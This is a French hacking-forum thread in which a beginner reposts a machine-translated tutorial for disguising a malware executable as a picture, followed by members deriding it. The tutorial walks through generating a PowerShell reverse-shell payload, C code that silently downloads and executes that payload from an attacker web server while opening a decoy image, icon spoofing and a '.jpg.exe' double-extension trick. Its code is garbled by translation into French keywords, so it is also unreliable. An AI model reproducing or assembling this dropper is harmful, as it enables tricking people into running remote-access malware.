Auteur Sujet: Créé un virus indétectable dans une image [Pour les plus expérimenté]  (Lu 9187 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Debutant-Kali
  • Membre Junior
  • *
  • Messages: 41
  • +0/-4
Pour les plus expérimenté, vous pensez quoi de ce tuto? C'est pour créé un virus indetectable dans une image. Je précise que ce tuto n'est pas le miens.
J'ai mis le début du tuto pour ceux qui veulent le lire je mettrais la seconde partie
Dite moi ce sur vous en pensez la commu'




Step 1
Creating the Virus Étape 1: Création du virus
Encore une fois, j'utiliserai la même technique que dans mon didacticiel original ... mais avec une légère torsion. Je vais faire en sorte que l'exécutable ouvre également une image de notre choix.

Partie I: Création de la charge utile Powershell
Nous allons utiliser la boîte à outils de l'ingénierie sociale pour créer notre charge utile. Pour l'ouvrir, tapez ceci dans la console:

setoolkit


À partir de là, tapez 1 pour "attaques d'ingénierie sociale", puis 9 pour "vecteurs d'attaque powershell", et enfin 1 pour "injecteur alphanumérique shellcode powershell".

Maintenant, vous devrez fournir un "LHOST". Si vous ne le saviez pas déjà, il s'agit de l'adresse IP locale de votre machine d'attaque (tant que vous attaquez un réseau local). Pour le déterminer, ouvrez une nouvelle fenêtre de terminal et saisissez:

ifconfig



Faites défiler jusqu'au haut pour trouver l'interface qui est connectée à votre réseau (dans mon cas, c'est "eth0"). Trouvez ce que j'ai mis en évidence, "inet", et à côté de vous, vous trouverez votre adresse IP locale (dans mon cas, c'est 10.0.0.13). C'est ce que vous entendrez pour votre LHOST.

Ensuite, il vous invite à taper un "port pour l'inverse". Il s'agit de "LPORT". Habituellement, j'utilise "4444" car c'est une convention de compteur de mesure, mais vous pouvez utiliser n'importe quel port que vous voulez tant que vous vous en souvenez.

Ensuite, il vous demandera si vous souhaitez "lancer l'auditeur maintenant". Tapez "non", nous le ferons manuellement plus tard. Pour l'instant, nous avons fini avec SET.

Maintenant, nous devrons transférer cette charge utile sur notre serveur web apache. Pour ce faire, ouvrez un terminal et tapez:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt

Cependant, si vous utilisez encore Kali Linux 1 (pas 2), utilisez cette commande:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/payload.txt


C'est parce que, dans Kali Linux version 2, le répertoire racine apache a été déplacé vers le dossier "html" dans / var / www /.

Nous aurons également besoin d'une image réelle à afficher à notre utilisateur lors de l'exécution du fichier. J'utiliserais celui-ci:


Image via quickmeme.com
Enregistrez ceci en tant que screenshot.jpg dans votre dossier serveur web apache (/ var / www dans kali 1 et / var / www / html dans kali 2). Nous l'utiliserons plus tard.

Maintenant, tapez simplement:

service apache2 start

... et votre serveur web devrait être lancé.

Partie II: Création de l'exécutable
Pour créer le virus, j'utilise le bloc-notes Windows et le «gcc» de MinGW. Le code du virus est le suivant:

#include <stdio.h>
principale()
{

système ("powershell.exe -w caché -c (nouvel objet System.Net.WebClient) .Downloadfile ('http://10.0.0.13/screenshot.jpg', 'C: \\ Users \\ Public \\ capture d'écran .jpg ') et start C: \\ Users \\ Public \\ screenshot.jpg & powershell.exe \ "IEX ((new-object net.webclient) .downloadstring (' http://10.0.0.13/payload.txt ')) \ "");


retour 0;
}

Code exécutable - lien Pastebin

N'oubliez pas de changer "10.0.0.13", car votre LHOST (ou adresse IP locale) sera probablement différent.

Si vous lisez mon premier tutoriel, vous pouvez remarquer le code ajouté: powershell.exe -w caché -c (nouvel objet System.Net.WebClient) .Downloadfile ('http://10.0.0.13/screenshot.jpg', ' C: \\ Users \\ Public \\ screenshot.jpg ') et start C: \\ Users \\ Public \\ screenshot.jpg

Ceci télécharge l'image de notre serveur Web et l'ouvre dans la visionneuse d'image par défaut, de sorte qu'une fois que le virus est ouvert, il n'entraine aucun soupçon.

Enregistrez ceci comme "evil.c", puis compilez-le en utilisant votre compilateur C préféré. Dans mon cas, j'utilise gcc, je tape:

gcc.exe D: \ Hacking \ evil.c -o D: \ Hacking \ evil.exe


Maintenant, nous avons un exécutable qui permet de télécharger et d'ouvrir et d'image, et exécute notre charge utile malveillante!


Step 2
Making the Executable 'Look' Like a Picture Étape 2: faire en sorte que l'exécutable «regarde» comme une image
D'abord, nous allons faire en sorte que notre exécutable «regarde» comme une image. À l'heure actuelle, l'icône est la valeur par défaut:


Cependant, cela ne dérangera personne. Changeons cela.

Nous allons convertir l'image screenshot.jpg en une icône. Pour ce faire, je vais simplement utiliser un convertisseur en ligne .

Maintenant, nous avons un fichier d'icone qui correspond à l'image que l'exécutable ouvrira. Nous utiliserons Resource Hacker pour définir l'icône de l'exécutable.

D'abord, ouvrez un hacker de ressources et cliquez sur Fichier -> Ouvrir



De là, choisissez l'exécutable que nous avons effectué à la première étape. Maintenant, cliquez sur le bouton Ajouter une image binaire ou une image et sélectionnez notre fichier .ico.



Enfin, cliquez sur Ajouter une ressource et enregistrer.



Maintenant, notre exécutable semble plus convaincant ...



Mais nous ne sommes pas encore terminés.

Step 3
Renaming the Executable Étape 3: Renommer l'exécutable
La dernière partie de notre virus semble être une image réelle qui change son nom. Si l'utilisateur voit une extension .exe, il est presque certain de ne pas l'ouvrir. Nous allons donc utiliser quelques techniques pour résoudre ce problème.

Possibilité I: The Classic ".jpg.exe"
Par défaut, Windows cache les extensions de fichiers connues. Le réglage ressemble à ceci:


Pour cette raison, il est possible de s'en sortir avec le renommage de l'exécutable à "evil.jpg.exe", et cela pourrait tromper la majorité des utilisateurs. Pour les utilisateurs qui n'ont pas changé le paramètre, notre fichier exécutable ressemblera à ceci:
.....

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Vu comme ça, c'est de la merde de script kiddie.

Hors ligne Koala
  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 331
  • +19/-0
D'autant plus qu'en plus d'avoir l'impression de partir a une chasse aux oeufs de paques en lisant le tuto, certains passage sont complètement érronés.

Citer
C'est parce que, dans Kali Linux version 2, le répertoire racine apache a été déplacé vers le dossier "html" dans / var / www /.

Le dossier html a toujours existé sous apache puisque créer par défaut, on peut changer la racine dans le 000-default.conf et le apache2.conf.

<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

Hors ligne Debutant-Kali
  • Membre Junior
  • *
  • Messages: 41
  • +0/-4
Vu comme ça, c'est de la merde de script kiddie.

Pourquoi ?

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Parce que c'est un tuto de kiddie tout simplement, pour faire plus simple, tu prends n'importe quel .exe dont tu change l'extension en .jpg (et pas avec la méthode du je compte sur le fait que windows n'affiche pas les extensions par défaut ou un truc du genre .jpg.exe) et qui affiche une image avec une tâche en background.

Hors ligne Debutant-Kali
  • Membre Junior
  • *
  • Messages: 41
  • +0/-4
D'autant plus qu'en plus d'avoir l'impression de partir a une chasse aux oeufs de paques en lisant le tuto, certains passage sont complètement érronés.

Citer
C'est parce que, dans Kali Linux version 2, le répertoire racine apache a été déplacé vers le dossier "html" dans / var / www /.

Le dossier html a toujours existé sous apache puisque créer par défaut, on peut changer la racine dans le 000-default.conf et le apache2.conf.

<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

 ;D ;D C'est ce passage la que j'ai pas compris gcc.exe D: \ Hacking \ evil.c -o D: \ Hacking \ evil.exe
Je sais pas c'est quoi j'ai essayer d'executer mais sa m'écrit commande introuvable

Hors ligne Debutant-Kali
  • Membre Junior
  • *
  • Messages: 41
  • +0/-4
Parce que c'est un tuto de kiddie tout simplement, pour faire plus simple, tu prends n'importe quel .exe dont tu change l'extension en .jpg (et pas avec la méthode du je compte sur le fait que windows n'affiche pas les extensions par défaut ou un truc du genre .jpg.exe) et qui affiche une image avec une tâche en background.

Tout le monde commence en étant un kiddie... ::) personne naît avec la science ultime  ;D
Si t'a un tuto perso tu peux le poster avec plaisir l'amis

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Tout le monde commence en étant un kiddie... ::) personne naît avec la science ultime  ;D
Si t'a un tuto perso tu peux le poster avec plaisir l'amis
Faux, les gens commence par apprendre le fonctionnement du réseau et à coder et ensuite, se tourne vers la sécurité informatique.
Ceux qui commencent par juste utiliser des code tout fait, et suivre des tutos ne vont en général pas loin.

Si tu veux des tuto de moi, tu n'a qu'a faire une recherche sur coyotus ou Icef0x, j'ai fais ma part de tuto je pense.

Hors ligne Le_Hulant
  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 369
  • +8/-8
Tout le monde commence en étant un kiddie... ::) personne naît avec la science ultime  ;D
Si t'a un tuto perso tu peux le poster avec plaisir l'amis
Faux, les gens commence par apprendre le fonctionnement du réseau et à coder et ensuite, se tourne vers la sécurité informatique.
Ceux qui commencent par juste utiliser des code tout fait, et suivre des tutos ne vont en général pas loin.

Si tu veux des tuto de moi, tu n'a qu'a faire une recherche sur coyotus ou Icef0x, j'ai fais ma part de tuto je pense.

J'ai commencé à 16 ans sur un Amstrad CPC 464 (à cassettes lol) j'ai un peu codé en basic..j'ai dans le même temps découvert Apple aux USA (chicago)
Puis j'ai fait le mêtier de chauffeur de bus tout en continuant à monter des PC en achetant des pièces détachées rue Montgallet...pour les vendre..
Puis j'ai appris à coder en C, et en PHP/SQL..(faut que je me mette au python)
Depuis 2012 j'ai changé de mêtier et maintenant je suis tech info dans les écoles...(hardware, logiciels mêtiers, formateur)
Aujourd'hui je voudrais bien qu'on m'implante directement tout le savoir mais on en est pas encore là, je continue toujours seul, avec difficultés car je rêve d'avoir la science infuse en réseaux / sécurité sans fil radio etc..(notamment avec SDR gnu_radio) j'en suis aux balbutiements mais avec ce que tu viens de dire Coyotus,
ça me motive, je vais peut-être aller loin du coup...??

Merci Coyotus, tu m'encourage...
Tu me dis j'oublie, tu m'enseignes je retiens, tu m'impliques j'apprends (B. FRANKLIN)

Dans la vie il y a 10 types de gens : ceux qui comprennent le binaire et ceux qui ne le comprennent pas.

Hors ligne _john_doe
  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 608
  • +37/-5
#include <stdio.h>
principale()
{
système ("powershell.exe -w caché -c (nouvel objet System.Net.WebClient) .Downloadfile ('http://10.0.0.13/screenshot.jpg', 'C: \\ Users \\ Public \\ capture d'écran .jpg ') et start C: \\ Users \\ Public \\ screenshot.jpg & powershell.exe \ "IEX ((new-object net.webclient) .downloadstring (' http://10.0.0.13/payload.txt ')) \ "");
retour 0;
}
Moi c'est ce qui m'a fait le plus rire. La traduction en Français d'un code en C.
Il est pas prêt de marcher le tuto.....

Citer
;D ;D C'est ce passage la que j'ai pas compris gcc.exe D: \ Hacking \ evil.c -o D: \ Hacking \ evil.exe
Je sais pas c'est quoi j'ai essayer d'executer mais sa m'écrit commande introuvable

C'est peut etre parceque tu cherche à lancer un binaire Windows dans un environnement Linux....
Tu as compris que dans ton tuto il fallait aussi se servir de Windows ?
Des indices :
- Notepad
-  GCC.exe
- D: (c'est un suport de stockage sous Windows)

Pour ceux que la version originale de ce tuto intéresserait....
https://null-byte.wonderhowto.com/how-to/hide-virus-inside-fake-picture-0168183/
« Modifié: 02 octobre 2017 à 16:00:17 par _john_doe »

Hors ligne WK

  • Contributeur de Kali-linux.fr
  • Membre régulier
  • *****
  • Messages: 188
  • +19/-1
J'en pense que je n'ai pas l'expérience nécéssaire pour ce tuto  :D
Comme dit oyotus, script-kiddie n'est pas un passage obligatoire, une sorte de bizutage ou quoi non non non.. Un script-kiddie est quelqu'un qui s'y prend mal et uqi n'a pas la bonne méthode, ni plus ni moins.

Hors ligne Debutant-Kali
  • Membre Junior
  • *
  • Messages: 41
  • +0/-4
Tout le monde commence en étant un kiddie... ::) personne naît avec la science ultime  ;D
Si t'a un tuto perso tu peux le poster avec plaisir l'amis
Faux, les gens commence par apprendre le fonctionnement du réseau et à coder et ensuite, se tourne vers la sécurité informatique.
Ceux qui commencent par juste utiliser des code tout fait, et suivre des tutos ne vont en général pas loin.

Si tu veux des tuto de moi, tu n'a qu'a faire une recherche sur coyotus ou Icef0x, j'ai fais ma part de tuto je pense.

Je suis entrain d'apprendre la programmation en C et C++, mes comptes personnels ont été pirater je veux les récupérés et je suis pressé de le faire donc je vais vers de simple tutoriels. Je suis pas un kiddie, je suis un débutant certe mais pas un kiddie si c'est cette définition non je ne le suis pas.

Hors ligne WK

  • Contributeur de Kali-linux.fr
  • Membre régulier
  • *****
  • Messages: 188
  • +19/-1
Tout le monde commence en étant un kiddie... ::) personne naît avec la science ultime  ;D
Si t'a un tuto perso tu peux le poster avec plaisir l'amis
Faux, les gens commence par apprendre le fonctionnement du réseau et à coder et ensuite, se tourne vers la sécurité informatique.
Ceux qui commencent par juste utiliser des code tout fait, et suivre des tutos ne vont en général pas loin.

Si tu veux des tuto de moi, tu n'a qu'a faire une recherche sur coyotus ou Icef0x, j'ai fais ma part de tuto je pense.

Je suis entrain d'apprendre la programmation en C et C++, mes comptes personnels ont été pirater je veux les récupérés et je suis pressé de le faire donc je vais vers de simple tutoriels. Je suis pas un kiddie, je suis un débutant certe mais pas un kiddie si c'est cette définition non je ne le suis pas.

Un mail à l'entreprise ou un "récupérer son compte" sera plus efficace quun "hack" foireux

Hors ligne Debutant-Kali
  • Membre Junior
  • *
  • Messages: 41
  • +0/-4
Tout le monde commence en étant un kiddie... ::) personne naît avec la science ultime  ;D
Si t'a un tuto perso tu peux le poster avec plaisir l'amis
Faux, les gens commence par apprendre le fonctionnement du réseau et à coder et ensuite, se tourne vers la sécurité informatique.
Ceux qui commencent par juste utiliser des code tout fait, et suivre des tutos ne vont en général pas loin.

Si tu veux des tuto de moi, tu n'a qu'a faire une recherche sur coyotus ou Icef0x, j'ai fais ma part de tuto je pense.

Je suis entrain d'apprendre la programmation en C et C++, mes comptes personnels ont été pirater je veux les récupérés et je suis pressé de le faire donc je vais vers de simple tutoriels. Je suis pas un kiddie, je suis un débutant certe mais pas un kiddie si c'est cette définition non je ne le suis pas.

Un mail à l'entreprise ou un "récupérer son compte" sera plus efficace quun "hack" foireux


J'ai déjà tout essayer impossible de récupéré mon facebook c'est pas mon vrai nom. Facebook refuse de me recouvrir mon compte